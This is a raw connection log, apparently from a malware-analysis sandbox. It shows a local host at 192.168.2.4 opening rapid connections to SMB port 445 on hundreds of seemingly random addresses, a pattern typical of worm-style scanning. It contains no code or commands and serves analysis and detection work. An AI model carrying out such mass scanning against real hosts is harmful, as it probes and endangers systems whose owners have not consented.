Apr 29, 2023 00:54:03.474087000 CEST	52096	445	192.168.2.4	184.252.245.17
Apr 29, 2023 00:54:03.475022078 CEST	52100	445	192.168.2.4	71.179.113.190
Apr 29, 2023 00:54:03.475311995 CEST	52101	445	192.168.2.4	199.141.86.246
Apr 29, 2023 00:54:03.475570917 CEST	52102	445	192.168.2.4	122.94.68.136
Apr 29, 2023 00:54:03.475738049 CEST	52103	445	192.168.2.4	128.88.93.100
Apr 29, 2023 00:54:03.476056099 CEST	52104	445	192.168.2.4	65.96.194.49
Apr 29, 2023 00:54:03.476326942 CEST	52105	445	192.168.2.4	199.209.8.112
Apr 29, 2023 00:54:03.477086067 CEST	52107	445	192.168.2.4	161.183.230.164
Apr 29, 2023 00:54:03.477221966 CEST	52108	445	192.168.2.4	136.162.129.83
Apr 29, 2023 00:54:03.477744102 CEST	52110	445	192.168.2.4	46.245.191.150
Apr 29, 2023 00:54:03.478049994 CEST	52111	445	192.168.2.4	103.149.14.238
Apr 29, 2023 00:54:03.478452921 CEST	52112	445	192.168.2.4	75.95.83.4
Apr 29, 2023 00:54:03.479012012 CEST	52116	445	192.168.2.4	100.44.166.228
Apr 29, 2023 00:54:03.479183912 CEST	52117	445	192.168.2.4	176.168.82.144
Apr 29, 2023 00:54:03.479651928 CEST	52119	445	192.168.2.4	193.60.55.94
Apr 29, 2023 00:54:03.479984999 CEST	52121	445	192.168.2.4	60.242.67.68
Apr 29, 2023 00:54:03.480176926 CEST	52122	445	192.168.2.4	27.121.220.235
Apr 29, 2023 00:54:03.480437994 CEST	52123	445	192.168.2.4	135.143.134.73
Apr 29, 2023 00:54:03.481174946 CEST	52127	445	192.168.2.4	73.100.22.196
Apr 29, 2023 00:54:03.481527090 CEST	52129	445	192.168.2.4	111.67.224.122
Apr 29, 2023 00:54:03.487093925 CEST	52130	445	192.168.2.4	102.38.190.187
Apr 29, 2023 00:54:03.487792969 CEST	52131	445	192.168.2.4	6.236.25.174
Apr 29, 2023 00:54:03.488432884 CEST	52132	445	192.168.2.4	17.233.149.132
Apr 29, 2023 00:54:03.489039898 CEST	52133	445	192.168.2.4	77.159.83.146
Apr 29, 2023 00:54:03.489726067 CEST	52134	445	192.168.2.4	204.146.250.108
Apr 29, 2023 00:54:03.588393927 CEST	445	52067	60.98.156.173	192.168.2.4
Apr 29, 2023 00:54:03.592340946 CEST	52135	445	192.168.2.4	56.131.3.109
Apr 29, 2023 00:54:03.592662096 CEST	52136	445	192.168.2.4	154.169.44.9
Apr 29, 2023 00:54:03.592914104 CEST	52137	445	192.168.2.4	166.41.37.70
Apr 29, 2023 00:54:03.593441963 CEST	52139	445	192.168.2.4	175.151.110.190
Apr 29, 2023 00:54:03.593872070 CEST	52141	445	192.168.2.4	25.185.74.28
Apr 29, 2023 00:54:03.594990969 CEST	52142	445	192.168.2.4	62.176.205.133
Apr 29, 2023 00:54:03.595694065 CEST	52143	445	192.168.2.4	59.19.142.103
Apr 29, 2023 00:54:04.592586040 CEST	52147	445	192.168.2.4	122.188.196.104
Apr 29, 2023 00:54:04.592586040 CEST	52149	445	192.168.2.4	29.247.154.181
Apr 29, 2023 00:54:04.592771053 CEST	52151	445	192.168.2.4	98.210.3.152
Apr 29, 2023 00:54:04.592866898 CEST	52152	445	192.168.2.4	177.170.246.52
Apr 29, 2023 00:54:04.592880964 CEST	52153	445	192.168.2.4	145.35.117.204
Apr 29, 2023 00:54:04.592955112 CEST	52154	445	192.168.2.4	82.140.153.30
Apr 29, 2023 00:54:04.593147993 CEST	52155	445	192.168.2.4	204.44.155.149
Apr 29, 2023 00:54:04.593159914 CEST	52156	445	192.168.2.4	17.31.83.219
Apr 29, 2023 00:54:04.593347073 CEST	52158	445	192.168.2.4	10.62.85.134
Apr 29, 2023 00:54:04.593483925 CEST	52160	445	192.168.2.4	133.200.126.116
Apr 29, 2023 00:54:04.593534946 CEST	52161	445	192.168.2.4	135.108.224.197
Apr 29, 2023 00:54:04.593674898 CEST	52163	445	192.168.2.4	141.3.137.59
Apr 29, 2023 00:54:04.594135046 CEST	52166	445	192.168.2.4	146.116.20.12
Apr 29, 2023 00:54:04.594197035 CEST	52168	445	192.168.2.4	156.6.60.209
Apr 29, 2023 00:54:04.594362020 CEST	52169	445	192.168.2.4	160.116.100.217
Apr 29, 2023 00:54:04.594440937 CEST	52170	445	192.168.2.4	203.133.107.37
Apr 29, 2023 00:54:04.594635963 CEST	52172	445	192.168.2.4	155.29.156.9
Apr 29, 2023 00:54:04.594692945 CEST	52173	445	192.168.2.4	194.70.25.70
Apr 29, 2023 00:54:04.594904900 CEST	52175	445	192.168.2.4	182.0.194.161
Apr 29, 2023 00:54:04.595010996 CEST	52178	445	192.168.2.4	195.31.241.38
Apr 29, 2023 00:54:04.626039982 CEST	52180	445	192.168.2.4	197.124.113.27
Apr 29, 2023 00:54:04.626146078 CEST	52181	445	192.168.2.4	141.7.232.229
Apr 29, 2023 00:54:04.626238108 CEST	52182	445	192.168.2.4	13.189.213.99
Apr 29, 2023 00:54:04.626379967 CEST	52183	445	192.168.2.4	129.57.186.143
Apr 29, 2023 00:54:04.629853964 CEST	52184	445	192.168.2.4	92.23.102.185
Apr 29, 2023 00:54:04.701519966 CEST	52185	445	192.168.2.4	152.84.8.249
Apr 29, 2023 00:54:04.701772928 CEST	52186	445	192.168.2.4	13.10.206.205
Apr 29, 2023 00:54:04.702054977 CEST	52187	445	192.168.2.4	131.58.134.25
Apr 29, 2023 00:54:04.702135086 CEST	52188	445	192.168.2.4	199.22.213.103
Apr 29, 2023 00:54:04.702543974 CEST	52190	445	192.168.2.4	63.22.131.198
Apr 29, 2023 00:54:04.734471083 CEST	52192	445	192.168.2.4	47.127.153.91
Apr 29, 2023 00:54:04.734471083 CEST	52193	445	192.168.2.4	132.23.243.29
Apr 29, 2023 00:54:05.724351883 CEST	52198	445	192.168.2.4	115.147.220.127
Apr 29, 2023 00:54:05.724507093 CEST	52199	445	192.168.2.4	211.194.200.54
Apr 29, 2023 00:54:05.724714041 CEST	52201	445	192.168.2.4	212.229.58.128
Apr 29, 2023 00:54:05.724833012 CEST	52202	445	192.168.2.4	210.43.75.207
Apr 29, 2023 00:54:05.724934101 CEST	52203	445	192.168.2.4	84.143.72.58
Apr 29, 2023 00:54:05.725037098 CEST	52204	445	192.168.2.4	16.104.14.129
Apr 29, 2023 00:54:05.725147009 CEST	52205	445	192.168.2.4	3.1.68.58
Apr 29, 2023 00:54:05.725260973 CEST	52206	445	192.168.2.4	30.219.126.176
Apr 29, 2023 00:54:05.725658894 CEST	52208	445	192.168.2.4	181.244.71.31
Apr 29, 2023 00:54:05.725857973 CEST	52210	445	192.168.2.4	112.183.39.186
Apr 29, 2023 00:54:05.726051092 CEST	52211	445	192.168.2.4	195.115.239.227
Apr 29, 2023 00:54:05.726166964 CEST	52212	445	192.168.2.4	21.178.33.169
Apr 29, 2023 00:54:05.726706982 CEST	52217	445	192.168.2.4	157.201.51.157
Apr 29, 2023 00:54:05.726831913 CEST	52218	445	192.168.2.4	122.17.131.254
Apr 29, 2023 00:54:05.727040052 CEST	52220	445	192.168.2.4	169.104.92.214
Apr 29, 2023 00:54:05.727231979 CEST	52222	445	192.168.2.4	176.159.21.152
Apr 29, 2023 00:54:05.727353096 CEST	52223	445	192.168.2.4	54.87.60.152
Apr 29, 2023 00:54:05.727431059 CEST	52219	445	192.168.2.4	145.180.174.68
Apr 29, 2023 00:54:05.727734089 CEST	52226	445	192.168.2.4	81.125.141.118
Apr 29, 2023 00:54:05.727850914 CEST	52227	445	192.168.2.4	74.175.96.21
Apr 29, 2023 00:54:05.749476910 CEST	52230	445	192.168.2.4	67.211.183.23
Apr 29, 2023 00:54:05.750350952 CEST	52231	445	192.168.2.4	3.188.136.249
Apr 29, 2023 00:54:05.750490904 CEST	52232	445	192.168.2.4	204.106.22.74
Apr 29, 2023 00:54:05.750996113 CEST	52233	445	192.168.2.4	216.48.226.126
Apr 29, 2023 00:54:05.751492977 CEST	52234	445	192.168.2.4	128.242.183.0
Apr 29, 2023 00:54:05.826554060 CEST	52236	445	192.168.2.4	77.159.52.228
Apr 29, 2023 00:54:05.826555014 CEST	52235	445	192.168.2.4	45.143.121.179
Apr 29, 2023 00:54:05.826740980 CEST	52238	445	192.168.2.4	184.159.83.200
Apr 29, 2023 00:54:05.826841116 CEST	52237	445	192.168.2.4	189.252.229.144
Apr 29, 2023 00:54:05.826953888 CEST	52240	445	192.168.2.4	63.47.216.165
Apr 29, 2023 00:54:05.873963118 CEST	52242	445	192.168.2.4	221.141.151.132
Apr 29, 2023 00:54:05.874349117 CEST	52243	445	192.168.2.4	44.151.185.185
Apr 29, 2023 00:54:06.843367100 CEST	52249	445	192.168.2.4	103.94.18.103
Apr 29, 2023 00:54:06.843645096 CEST	52250	445	192.168.2.4	213.233.164.1
Apr 29, 2023 00:54:06.844121933 CEST	52253	445	192.168.2.4	163.133.166.197
Apr 29, 2023 00:54:06.844266891 CEST	52254	445	192.168.2.4	166.185.23.199
Apr 29, 2023 00:54:06.844476938 CEST	52255	445	192.168.2.4	34.25.193.152
Apr 29, 2023 00:54:06.844988108 CEST	52252	445	192.168.2.4	47.171.123.46
Apr 29, 2023 00:54:06.844988108 CEST	52256	445	192.168.2.4	10.136.249.233
Apr 29, 2023 00:54:06.845388889 CEST	52259	445	192.168.2.4	188.88.242.147
Apr 29, 2023 00:54:06.845712900 CEST	52261	445	192.168.2.4	108.82.117.186
Apr 29, 2023 00:54:06.845900059 CEST	52262	445	192.168.2.4	187.237.117.46
Apr 29, 2023 00:54:06.846049070 CEST	52263	445	192.168.2.4	58.26.103.127
Apr 29, 2023 00:54:06.846512079 CEST	52268	445	192.168.2.4	38.218.248.5
Apr 29, 2023 00:54:06.846638918 CEST	52269	445	192.168.2.4	26.74.210.202
Apr 29, 2023 00:54:06.846869946 CEST	52271	445	192.168.2.4	31.104.102.24
Apr 29, 2023 00:54:06.846910954 CEST	52270	445	192.168.2.4	162.229.197.80
Apr 29, 2023 00:54:06.847295046 CEST	52274	445	192.168.2.4	223.103.101.51
Apr 29, 2023 00:54:06.847445011 CEST	52273	445	192.168.2.4	180.81.47.202
Apr 29, 2023 00:54:06.847616911 CEST	52277	445	192.168.2.4	61.64.78.173
Apr 29, 2023 00:54:06.848889112 CEST	52278	445	192.168.2.4	54.151.56.193
Apr 29, 2023 00:54:06.875221968 CEST	52281	445	192.168.2.4	200.98.204.185
Apr 29, 2023 00:54:06.877147913 CEST	52282	445	192.168.2.4	28.0.234.135
Apr 29, 2023 00:54:06.886641026 CEST	52283	445	192.168.2.4	8.186.47.117
Apr 29, 2023 00:54:06.887780905 CEST	52284	445	192.168.2.4	107.16.126.137
Apr 29, 2023 00:54:06.888269901 CEST	52285	445	192.168.2.4	155.2.82.76
Apr 29, 2023 00:54:06.936116934 CEST	52286	445	192.168.2.4	120.115.133.164
Apr 29, 2023 00:54:06.936558008 CEST	52289	445	192.168.2.4	56.236.90.172
Apr 29, 2023 00:54:06.936711073 CEST	52290	445	192.168.2.4	1.133.4.229
Apr 29, 2023 00:54:06.937010050 CEST	52292	445	192.168.2.4	132.186.234.253
Apr 29, 2023 00:54:06.937036037 CEST	52291	445	192.168.2.4	103.248.189.203
Apr 29, 2023 00:54:06.983800888 CEST	52293	445	192.168.2.4	141.41.226.243
Apr 29, 2023 00:54:06.984256029 CEST	52294	445	192.168.2.4	58.83.116.215
Apr 29, 2023 00:54:07.967427969 CEST	52299	445	192.168.2.4	125.44.116.16
Apr 29, 2023 00:54:07.967468023 CEST	52298	445	192.168.2.4	158.147.115.178
Apr 29, 2023 00:54:07.967622042 CEST	52301	445	192.168.2.4	149.235.59.50
Apr 29, 2023 00:54:07.967947960 CEST	52303	445	192.168.2.4	85.182.82.82
Apr 29, 2023 00:54:07.967964888 CEST	52307	445	192.168.2.4	139.116.106.129
Apr 29, 2023 00:54:07.967981100 CEST	52306	445	192.168.2.4	113.118.229.178
Apr 29, 2023 00:54:07.968087912 CEST	52308	445	192.168.2.4	38.76.124.62
Apr 29, 2023 00:54:07.968139887 CEST	52309	445	192.168.2.4	62.231.95.146
Apr 29, 2023 00:54:07.968297958 CEST	52313	445	192.168.2.4	102.79.92.153
Apr 29, 2023 00:54:07.968544006 CEST	52316	445	192.168.2.4	81.108.40.229
Apr 29, 2023 00:54:07.968595982 CEST	52315	445	192.168.2.4	71.8.160.32
Apr 29, 2023 00:54:07.968724012 CEST	52318	445	192.168.2.4	182.71.230.150
Apr 29, 2023 00:54:07.968841076 CEST	52320	445	192.168.2.4	170.111.78.4
Apr 29, 2023 00:54:07.968889952 CEST	52321	445	192.168.2.4	79.196.174.189
Apr 29, 2023 00:54:07.968920946 CEST	52322	445	192.168.2.4	192.99.208.99
Apr 29, 2023 00:54:07.969028950 CEST	52323	445	192.168.2.4	76.191.128.233
Apr 29, 2023 00:54:07.969053030 CEST	52324	445	192.168.2.4	65.98.47.192
Apr 29, 2023 00:54:07.969146013 CEST	52325	445	192.168.2.4	47.62.150.86
Apr 29, 2023 00:54:07.969297886 CEST	52327	445	192.168.2.4	78.200.185.249
Apr 29, 2023 00:54:07.969412088 CEST	52329	445	192.168.2.4	90.59.190.228
Apr 29, 2023 00:54:07.999047041 CEST	52332	445	192.168.2.4	203.229.192.136
Apr 29, 2023 00:54:07.999795914 CEST	52333	445	192.168.2.4	177.5.41.42
Apr 29, 2023 00:54:08.000380039 CEST	52334	445	192.168.2.4	42.189.62.250
Apr 29, 2023 00:54:08.000962973 CEST	52335	445	192.168.2.4	15.109.32.174
Apr 29, 2023 00:54:08.001580000 CEST	52336	445	192.168.2.4	168.253.171.119
Apr 29, 2023 00:54:08.067502022 CEST	52337	445	192.168.2.4	23.134.181.36
Apr 29, 2023 00:54:08.067800045 CEST	52340	445	192.168.2.4	162.141.49.236
Apr 29, 2023 00:54:08.068094015 CEST	52342	445	192.168.2.4	48.60.75.96
Apr 29, 2023 00:54:08.068190098 CEST	52343	445	192.168.2.4	223.60.104.58
Apr 29, 2023 00:54:08.068572044 CEST	52341	445	192.168.2.4	209.206.183.25
Apr 29, 2023 00:54:08.124365091 CEST	52344	445	192.168.2.4	81.46.104.22
Apr 29, 2023 00:54:08.125066996 CEST	52345	445	192.168.2.4	223.150.114.75
Apr 29, 2023 00:54:08.783843040 CEST	445	52313	102.79.92.153	192.168.2.4
Apr 29, 2023 00:54:08.785186052 CEST	445	52313	102.79.92.153	192.168.2.4
Apr 29, 2023 00:54:09.092801094 CEST	52351	445	192.168.2.4	157.133.206.249
Apr 29, 2023 00:54:09.093257904 CEST	52353	445	192.168.2.4	191.53.105.177
Apr 29, 2023 00:54:09.093760014 CEST	52355	445	192.168.2.4	209.149.138.12
Apr 29, 2023 00:54:09.093976974 CEST	52356	445	192.168.2.4	103.149.29.223
Apr 29, 2023 00:54:09.094185114 CEST	52357	445	192.168.2.4	40.124.154.208
Apr 29, 2023 00:54:09.094463110 CEST	52358	445	192.168.2.4	68.177.166.102
Apr 29, 2023 00:54:09.094541073 CEST	52359	445	192.168.2.4	66.74.33.225
Apr 29, 2023 00:54:09.094774961 CEST	52360	445	192.168.2.4	131.125.150.118
Apr 29, 2023 00:54:09.094989061 CEST	52362	445	192.168.2.4	76.25.28.77
Apr 29, 2023 00:54:09.095449924 CEST	52364	445	192.168.2.4	4.79.135.95
Apr 29, 2023 00:54:09.095693111 CEST	52366	445	192.168.2.4	11.172.89.92
Apr 29, 2023 00:54:09.095973015 CEST	52367	445	192.168.2.4	157.16.176.164
Apr 29, 2023 00:54:09.096231937 CEST	52370	445	192.168.2.4	57.161.132.62
Apr 29, 2023 00:54:09.096434116 CEST	52372	445	192.168.2.4	114.189.106.161
Apr 29, 2023 00:54:09.096561909 CEST	52373	445	192.168.2.4	29.130.215.1
Apr 29, 2023 00:54:09.096635103 CEST	52374	445	192.168.2.4	117.138.162.56
Apr 29, 2023 00:54:09.096951008 CEST	52377	445	192.168.2.4	91.250.121.184
Apr 29, 2023 00:54:09.097095966 CEST	52380	445	192.168.2.4	66.234.4.120
Apr 29, 2023 00:54:09.097352982 CEST	52383	445	192.168.2.4	96.8.81.167
Apr 29, 2023 00:54:09.097358942 CEST	52382	445	192.168.2.4	97.150.159.12
Apr 29, 2023 00:54:09.124443054 CEST	52384	445	192.168.2.4	167.13.210.59
Apr 29, 2023 00:54:09.124777079 CEST	52385	445	192.168.2.4	201.195.99.83
Apr 29, 2023 00:54:09.125380039 CEST	52386	445	192.168.2.4	163.40.80.71
Apr 29, 2023 00:54:09.126229048 CEST	52387	445	192.168.2.4	202.104.176.113
Apr 29, 2023 00:54:09.127069950 CEST	52388	445	192.168.2.4	215.247.90.2
Apr 29, 2023 00:54:09.186034918 CEST	52390	445	192.168.2.4	194.97.161.93
Apr 29, 2023 00:54:09.186034918 CEST	52389	445	192.168.2.4	169.144.17.119
Apr 29, 2023 00:54:09.186285019 CEST	52393	445	192.168.2.4	196.176.43.244
Apr 29, 2023 00:54:09.186338902 CEST	52394	445	192.168.2.4	153.86.231.82
Apr 29, 2023 00:54:09.186405897 CEST	52395	445	192.168.2.4	71.28.142.67
Apr 29, 2023 00:54:09.233788013 CEST	52396	445	192.168.2.4	3.190.55.124
Apr 29, 2023 00:54:09.233860016 CEST	52397	445	192.168.2.4	27.172.35.128
Apr 29, 2023 00:54:10.202753067 CEST	52403	445	192.168.2.4	167.141.70.67
Apr 29, 2023 00:54:10.202753067 CEST	52405	445	192.168.2.4	136.161.85.217
Apr 29, 2023 00:54:10.202904940 CEST	52407	445	192.168.2.4	4.174.102.224
Apr 29, 2023 00:54:10.203093052 CEST	52408	445	192.168.2.4	138.74.39.133
Apr 29, 2023 00:54:10.203248978 CEST	52409	445	192.168.2.4	46.45.74.197
Apr 29, 2023 00:54:10.203358889 CEST	52410	445	192.168.2.4	48.241.47.231
Apr 29, 2023 00:54:10.203495979 CEST	52411	445	192.168.2.4	9.21.33.95
Apr 29, 2023 00:54:10.203739882 CEST	52413	445	192.168.2.4	66.34.41.43
Apr 29, 2023 00:54:10.203927994 CEST	52415	445	192.168.2.4	98.16.99.213
Apr 29, 2023 00:54:10.204116106 CEST	52417	445	192.168.2.4	122.208.69.175
Apr 29, 2023 00:54:10.204272985 CEST	52418	445	192.168.2.4	154.168.105.0
Apr 29, 2023 00:54:10.204547882 CEST	52421	445	192.168.2.4	48.35.18.41
Apr 29, 2023 00:54:10.204822063 CEST	52423	445	192.168.2.4	185.254.124.91
Apr 29, 2023 00:54:10.204933882 CEST	52424	445	192.168.2.4	110.242.76.114
Apr 29, 2023 00:54:10.205034971 CEST	52425	445	192.168.2.4	163.9.92.54
Apr 29, 2023 00:54:10.205363035 CEST	52429	445	192.168.2.4	19.94.233.233
Apr 29, 2023 00:54:10.205662012 CEST	52431	445	192.168.2.4	143.84.41.50
Apr 29, 2023 00:54:10.205893993 CEST	52433	445	192.168.2.4	216.106.166.164
Apr 29, 2023 00:54:10.206144094 CEST	52435	445	192.168.2.4	204.39.145.233
Apr 29, 2023 00:54:10.206202030 CEST	52434	445	192.168.2.4	70.142.239.5
Apr 29, 2023 00:54:10.233958960 CEST	52436	445	192.168.2.4	170.152.159.215
Apr 29, 2023 00:54:10.234612942 CEST	52437	445	192.168.2.4	157.148.168.81
Apr 29, 2023 00:54:10.235235929 CEST	52438	445	192.168.2.4	146.44.238.223
Apr 29, 2023 00:54:10.235860109 CEST	52439	445	192.168.2.4	36.127.99.16
Apr 29, 2023 00:54:10.236289978 CEST	52440	445	192.168.2.4	19.126.13.184
Apr 29, 2023 00:54:10.311323881 CEST	52441	445	192.168.2.4	208.156.41.34
Apr 29, 2023 00:54:10.311495066 CEST	52443	445	192.168.2.4	221.60.87.89
Apr 29, 2023 00:54:10.311736107 CEST	52445	445	192.168.2.4	102.11.68.217
Apr 29, 2023 00:54:10.311815977 CEST	52447	445	192.168.2.4	140.230.249.191
Apr 29, 2023 00:54:10.311851025 CEST	52446	445	192.168.2.4	108.44.48.252
Apr 29, 2023 00:54:10.380955935 CEST	52448	445	192.168.2.4	206.235.151.193
Apr 29, 2023 00:54:10.381516933 CEST	52449	445	192.168.2.4	177.108.208.132
Apr 29, 2023 00:54:11.327769041 CEST	52456	445	192.168.2.4	50.82.100.70
Apr 29, 2023 00:54:11.327785015 CEST	52458	445	192.168.2.4	172.158.230.66
Apr 29, 2023 00:54:11.328151941 CEST	52460	445	192.168.2.4	19.197.152.98
Apr 29, 2023 00:54:11.328573942 CEST	52461	445	192.168.2.4	64.65.220.218
Apr 29, 2023 00:54:11.328923941 CEST	52462	445	192.168.2.4	133.154.155.88
Apr 29, 2023 00:54:11.329298019 CEST	52463	445	192.168.2.4	148.94.241.133
Apr 29, 2023 00:54:11.329675913 CEST	52464	445	192.168.2.4	138.18.67.45
Apr 29, 2023 00:54:11.330017090 CEST	52466	445	192.168.2.4	136.37.202.68
Apr 29, 2023 00:54:11.330611944 CEST	52468	445	192.168.2.4	40.120.198.122
Apr 29, 2023 00:54:11.330899000 CEST	52470	445	192.168.2.4	35.133.143.227
Apr 29, 2023 00:54:11.331249952 CEST	52471	445	192.168.2.4	134.245.148.160
Apr 29, 2023 00:54:11.331808090 CEST	52474	445	192.168.2.4	64.51.86.154
Apr 29, 2023 00:54:11.332331896 CEST	52477	445	192.168.2.4	64.229.180.229
Apr 29, 2023 00:54:11.332339048 CEST	52476	445	192.168.2.4	76.195.5.43
Apr 29, 2023 00:54:11.332664013 CEST	52478	445	192.168.2.4	198.23.134.206
Apr 29, 2023 00:54:11.333262920 CEST	52482	445	192.168.2.4	177.98.44.92
Apr 29, 2023 00:54:11.333647013 CEST	52484	445	192.168.2.4	80.62.219.20
Apr 29, 2023 00:54:11.333946943 CEST	52486	445	192.168.2.4	173.196.162.81
Apr 29, 2023 00:54:11.334116936 CEST	52487	445	192.168.2.4	211.234.65.154
Apr 29, 2023 00:54:11.334264040 CEST	52488	445	192.168.2.4	73.223.120.105
Apr 29, 2023 00:54:11.376351118 CEST	52489	445	192.168.2.4	77.144.66.18
Apr 29, 2023 00:54:11.376492023 CEST	52491	445	192.168.2.4	94.14.2.94
Apr 29, 2023 00:54:11.376493931 CEST	52490	445	192.168.2.4	179.30.83.244
Apr 29, 2023 00:54:11.376600981 CEST	52492	445	192.168.2.4	16.233.58.110
Apr 29, 2023 00:54:11.376692057 CEST	52493	445	192.168.2.4	153.12.150.60
Apr 29, 2023 00:54:11.420941114 CEST	52494	445	192.168.2.4	119.177.239.25
Apr 29, 2023 00:54:11.421614885 CEST	52495	445	192.168.2.4	80.97.61.90
Apr 29, 2023 00:54:11.422274113 CEST	52498	445	192.168.2.4	23.24.174.38
Apr 29, 2023 00:54:11.423409939 CEST	52499	445	192.168.2.4	36.213.158.138
Apr 29, 2023 00:54:11.423588037 CEST	52500	445	192.168.2.4	209.67.105.58
Apr 29, 2023 00:54:11.483982086 CEST	52501	445	192.168.2.4	95.215.184.35
Apr 29, 2023 00:54:11.484044075 CEST	52502	445	192.168.2.4	72.134.140.238
Apr 29, 2023 00:54:12.459382057 CEST	52509	445	192.168.2.4	122.79.213.98
Apr 29, 2023 00:54:12.459386110 CEST	52508	445	192.168.2.4	43.25.115.117
Apr 29, 2023 00:54:12.459490061 CEST	52510	445	192.168.2.4	110.5.50.171
Apr 29, 2023 00:54:12.459619999 CEST	52511	445	192.168.2.4	4.148.109.182
Apr 29, 2023 00:54:12.459738016 CEST	52512	445	192.168.2.4	187.55.176.113
Apr 29, 2023 00:54:12.460043907 CEST	52514	445	192.168.2.4	109.151.149.62
Apr 29, 2023 00:54:12.460314989 CEST	52516	445	192.168.2.4	77.1.56.131
Apr 29, 2023 00:54:12.469445944 CEST	52519	445	192.168.2.4	187.213.125.244
Apr 29, 2023 00:54:12.469615936 CEST	52520	445	192.168.2.4	7.244.250.129
Apr 29, 2023 00:54:12.469789028 CEST	52521	445	192.168.2.4	181.156.199.70
Apr 29, 2023 00:54:12.471281052 CEST	52523	445	192.168.2.4	204.208.97.52
Apr 29, 2023 00:54:12.471867085 CEST	52525	445	192.168.2.4	156.87.19.232
Apr 29, 2023 00:54:12.479707003 CEST	52528	445	192.168.2.4	82.184.177.111
Apr 29, 2023 00:54:12.480000973 CEST	52530	445	192.168.2.4	172.153.247.156
Apr 29, 2023 00:54:12.480077028 CEST	52531	445	192.168.2.4	158.109.44.109
Apr 29, 2023 00:54:12.480442047 CEST	52533	445	192.168.2.4	68.98.244.40
Apr 29, 2023 00:54:12.480505943 CEST	52537	445	192.168.2.4	57.28.29.37
Apr 29, 2023 00:54:12.480518103 CEST	52536	445	192.168.2.4	11.65.55.103
Apr 29, 2023 00:54:12.480880976 CEST	52539	445	192.168.2.4	216.186.181.76
Apr 29, 2023 00:54:12.480880976 CEST	52541	445	192.168.2.4	2.230.184.247
Apr 29, 2023 00:54:12.504761934 CEST	52543	445	192.168.2.4	94.244.10.92
Apr 29, 2023 00:54:12.507118940 CEST	52544	445	192.168.2.4	13.182.51.85
Apr 29, 2023 00:54:12.510209084 CEST	52545	445	192.168.2.4	101.20.170.100
Apr 29, 2023 00:54:12.568806887 CEST	52546	445	192.168.2.4	208.103.93.75
Apr 29, 2023 00:54:12.569549084 CEST	52547	445	192.168.2.4	10.141.184.235
Apr 29, 2023 00:54:12.569740057 CEST	52548	445	192.168.2.4	14.185.240.240
Apr 29, 2023 00:54:12.569926023 CEST	52549	445	192.168.2.4	75.11.252.205
Apr 29, 2023 00:54:12.570261002 CEST	52552	445	192.168.2.4	46.49.109.247
Apr 29, 2023 00:54:12.570333958 CEST	52553	445	192.168.2.4	136.108.51.75
Apr 29, 2023 00:54:12.570761919 CEST	52554	445	192.168.2.4	14.90.54.48
Apr 29, 2023 00:54:12.669533968 CEST	52555	445	192.168.2.4	24.198.147.224
Apr 29, 2023 00:54:12.674711943 CEST	52556	445	192.168.2.4	85.30.144.38
Apr 29, 2023 00:54:13.569437981 CEST	52563	445	192.168.2.4	221.198.203.229
Apr 29, 2023 00:54:13.569519043 CEST	52562	445	192.168.2.4	158.195.88.204
Apr 29, 2023 00:54:13.569652081 CEST	52564	445	192.168.2.4	124.81.110.125
Apr 29, 2023 00:54:13.569760084 CEST	52565	445	192.168.2.4	145.172.67.188
Apr 29, 2023 00:54:13.569773912 CEST	52566	445	192.168.2.4	99.50.83.233
Apr 29, 2023 00:54:13.569905996 CEST	52567	445	192.168.2.4	2.20.203.192
Apr 29, 2023 00:54:13.570106030 CEST	52570	445	192.168.2.4	213.87.84.156
Apr 29, 2023 00:54:13.590667963 CEST	52573	445	192.168.2.4	33.121.186.81
Apr 29, 2023 00:54:13.590867043 CEST	52574	445	192.168.2.4	10.145.70.189
Apr 29, 2023 00:54:13.590934992 CEST	52575	445	192.168.2.4	54.142.23.2
Apr 29, 2023 00:54:13.591243982 CEST	52577	445	192.168.2.4	195.80.18.102
Apr 29, 2023 00:54:13.591540098 CEST	52579	445	192.168.2.4	6.4.31.22
Apr 29, 2023 00:54:13.592081070 CEST	52583	445	192.168.2.4	186.9.187.193
Apr 29, 2023 00:54:13.592267990 CEST	52584	445	192.168.2.4	192.181.27.44
Apr 29, 2023 00:54:13.592425108 CEST	52585	445	192.168.2.4	27.150.227.10
Apr 29, 2023 00:54:13.592583895 CEST	52587	445	192.168.2.4	89.53.174.58
Apr 29, 2023 00:54:13.592681885 CEST	52590	445	192.168.2.4	91.124.43.114
Apr 29, 2023 00:54:13.592720032 CEST	52591	445	192.168.2.4	5.42.214.109
Apr 29, 2023 00:54:13.592900991 CEST	52593	445	192.168.2.4	59.96.169.153
Apr 29, 2023 00:54:13.593023062 CEST	52596	445	192.168.2.4	167.219.222.47
Apr 29, 2023 00:54:13.629823923 CEST	52597	445	192.168.2.4	133.221.31.30
Apr 29, 2023 00:54:13.630265951 CEST	52598	445	192.168.2.4	141.213.155.162
Apr 29, 2023 00:54:13.630765915 CEST	52599	445	192.168.2.4	135.110.46.138
Apr 29, 2023 00:54:13.689127922 CEST	52600	445	192.168.2.4	61.24.123.152
Apr 29, 2023 00:54:13.689238071 CEST	52601	445	192.168.2.4	60.187.117.48
Apr 29, 2023 00:54:13.689343929 CEST	52602	445	192.168.2.4	160.94.63.105
Apr 29, 2023 00:54:13.689939976 CEST	52606	445	192.168.2.4	71.175.251.199
Apr 29, 2023 00:54:13.729696989 CEST	52607	445	192.168.2.4	122.208.104.49
Apr 29, 2023 00:54:13.730300903 CEST	52608	445	192.168.2.4	215.107.77.60
Apr 29, 2023 00:54:13.836728096 CEST	52610	445	192.168.2.4	88.252.81.136
Apr 29, 2023 00:54:13.837181091 CEST	52611	445	192.168.2.4	206.181.8.72
Apr 29, 2023 00:54:14.700186968 CEST	52617	445	192.168.2.4	167.66.186.160
Apr 29, 2023 00:54:14.700191021 CEST	52618	445	192.168.2.4	155.151.195.134
Apr 29, 2023 00:54:14.700272083 CEST	52619	445	192.168.2.4	34.161.239.59
Apr 29, 2023 00:54:14.700362921 CEST	52620	445	192.168.2.4	88.145.45.235
Apr 29, 2023 00:54:14.700481892 CEST	52621	445	192.168.2.4	7.83.182.114
Apr 29, 2023 00:54:14.700620890 CEST	52623	445	192.168.2.4	6.15.206.108
Apr 29, 2023 00:54:14.700874090 CEST	52626	445	192.168.2.4	149.150.252.185
Apr 29, 2023 00:54:14.722565889 CEST	52628	445	192.168.2.4	12.170.37.46
Apr 29, 2023 00:54:14.722795963 CEST	52629	445	192.168.2.4	204.132.42.158
Apr 29, 2023 00:54:14.722990036 CEST	52631	445	192.168.2.4	165.87.252.65
Apr 29, 2023 00:54:14.723129034 CEST	52633	445	192.168.2.4	191.228.27.251
Apr 29, 2023 00:54:14.723361015 CEST	52636	445	192.168.2.4	168.239.92.196
